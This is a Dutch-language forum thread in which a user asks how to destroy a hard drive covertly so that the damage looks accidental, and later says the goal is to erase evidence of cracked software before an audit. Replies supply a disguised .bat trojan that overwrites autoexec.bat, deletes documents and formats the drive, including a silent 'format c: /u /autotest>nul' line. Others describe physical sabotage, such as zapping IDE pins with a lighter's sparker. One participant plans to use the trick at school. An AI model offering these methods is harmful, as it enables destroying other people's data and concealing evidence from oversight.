HD laten crashen

vbimport

Hoe laat je een Harde Schijf crashen dat ie echt volledig om zeep is en er echt niks terug gevonden kan worden? Liefst wel subtiele methodes want ik kan hier natuurlijk niet met een moker op die HD staan meppen. Misschien iets dat op een virus lijkt of zo. Of andere geintjes. Het moet zo weinig mogelijk opvallen dat ik wat geholpen heb bij de crash :wink:

greetz

Zoiets zoek ik nu al jaren…:wink:

maak een *.bat bestand aan met de volgende lijntjes:

del c:\autoexec.bat
copy “naam van jouw file”.bat c:
rename “naam van jouw file”.bat autoexec.bat
del c:\mijn documenten*.doc
rename c:\mp3*.mp3 blabla.jpg (verander dit in de directory waar ie z’n mp3’s heeft staan)

=> elke keer dat ie z’n pc start, worden zijn documenten gewist en z’n mp3’s jpg’s. (je kan tal van andere lijnen toevoegen; kies zelf maar wat en wees creatief ;))
BTW, als j’m echt wil fucken, dan voeg je lijntje toe "rename c:\windows\win.ini of *.dll *.mp3 ofzo :))
Of eenvoudiger;
format c:\ :o

Het einge wat moet gebeuren, is dat ie het door jou aangemaakte .bat bestand 1 keer runt, dus geef et een aantrekkelijke naam :wink:

Low Level format…

Anders heb ik nog wel een leuk MP3tje ergens staan waar iemand beetgenomen wordt:
Volgens mij deze (kan em hier niet testen op deze PC, geen geluidskaart)

Is alleen leuk voor mensen die de oude DOS commando’s nog kennen…

Maar als ze echt willen dan kunnen ze de data altijd terughalen, want ik ga er vanuit dat het niet bedoeld is om iemand anders te pakken, maar je eigen bewijsmateriaal te vernietigen in geval van :wink:

Er zijn bedrijven die zelfs in staat zijn om een verbrande harde schijf nog voor een deel te herstellen…kost een lieve duit, maar het kan erg ver gaan tegenwoordig…

je kan naturlijk ook het anti filter van napstar downloaden is ook alles eraf

zet er gewoon een stevige magneet op dat zou ook moeten werken.

format c: /s

MaFd0n

De bedoeling is dus dat de schijf zodanig om zeep is (per ongeluk :wink: ) dat er een andere schijf gestoken moet worden. Zo is al het ‘bewijsmateriaal’ ook weg.

greetz

Ow, de HD moet echt kapot. Euhm dan zou het al via FDISK moeten en dan wat zitten klooien met partities enzo. Maar hoe je dat “ongemerkt” doet weet ik ook niet.
De minst subtiele oplossing is er een 9mm doorrammen, maar let dan wel op voor brokstukken :slight_smile:

Heel eenvoudig hoor! ;-))
Gewoon een paar keer met de aluminium zijde plat op de grond laten vallen… Gewwon er op letten dat ze niet op de hoek stoor, anders zie je het wel natuurlijk. Maar op de platte kant laten vallen, dan boren de koppen zich diep in het schijfoppervlak zonder dat je ook maar iets kunt zien…

ofwel heel erg subtiel…
Je kent vast wel een moderne aansteker met een vonkje dat overspringt… ’
Demonteer deze en haal het vonkover slag mechanisme met de draad eraan uit de aansteker.
Trek nu de ide kabel los van de hdd. Ga met het draadje van de aansteker op een van de pinnetjes van de harde schijf en druk een paart maal op de knop…
Voila, je harde schijf is volledig om zeep in 1 seconde, zonder dat je iets ziet. Ze zal zelfs nog opstarten… Maar werken…
Das niet meer mogelijk met vernielde chips … En dat is alleen intern, uitwendig zie je helemaal niks, zefs niet met een microscoop.

Is alleen leuk voor mensen die de oude DOS commando’s nog kennen…

En ik ken ze nog…:smiley:

Wammes, je hebt me op een zeer gemeen idee gebracht… Op school zullen ze het binnenkort wel merken:cool: …

Ok, het was een ander bestandje, wordt nu geüpload en is te vinden via de volgende link:

Prank Phone Calls (1,60 MB)

Duurt ongeveer 7 minuten, maar je moet niet meteen naar het einde gaan, dat is niet leuk, je moet goed luisteren wat de vrouw tussendoor ook zegt :smiley: :smiley:

hmmz bij mij op school kan k het autoexec niet eens bekijken :frowning:

Grtz JP.

format c: /u /autotest>nul

in autoexec.bat als 1ste regel zetten :wink:

als iemand pc aanzet wordt de hd direct geformateerd zonder dat er ook maar iets op het scherm te zien is :smiley:

Leuke mp3, Tax. Dat moet ik dringend ook eens uitproberen:)

ik heb een heel gevraarlijke… ooit eens BIJNA gelaunched bij iemand, maar toch maar niet, vond ut TE ver gaan.

tis een bat bestandje die even wat verder gaat dan removen of deleten van bestanden, maar werkelijk je HDD sloopt, meeste zullen het niet geloven, maar tis toch echt zo, betekend echt ut einde van je HDD als je um wilt proberen.

Een goede virusscanner zal um overigens wel detecteren, maarja wie let daar nou op…

waar heb je um eigenlijk voor “nodig” …voor je school zeker?

Niet voor school, maar meer voor iets anders … Op deze HD, die ik weg wil hebben, stonden tot voor kort redelijk wat gekraakte versies van toch wel dure professionele software. Vermits gewoon uninstallen en register opkuisen niet voldoende is om echt alle bewijs weg te werken, zoek ik de harde manier van HD om zeep helpen. Maar het moet dus wel erg subtiel gebeuren, omdat ie ten eerste echt om zeep moet zijn en omdat ik zelf niet direct over de plaatsing van een nieuwe HD kan en mag beslissen. Een nieuwe HD plaatsen en alle software (de legale dan :slight_smile: ) terug installeren zou ons al een dagje zoet houden. Als je dan weet dat het hier ontzettend druk is, begrijp je wel dat ze daar niet meteen in zullen toestemmen. Tenslotte wil ik toch een beetje safe zitten als er controle langs zou komen …

greetz

Daarvoor hoef je hem toch niet te mollen? Gewoon low level format en alles is echt weg!

ja kan hem ook aan mij schenken als je er echt zo graag vanaf wilt hehehe kan wel wat ruimte gebruiken :slight_smile: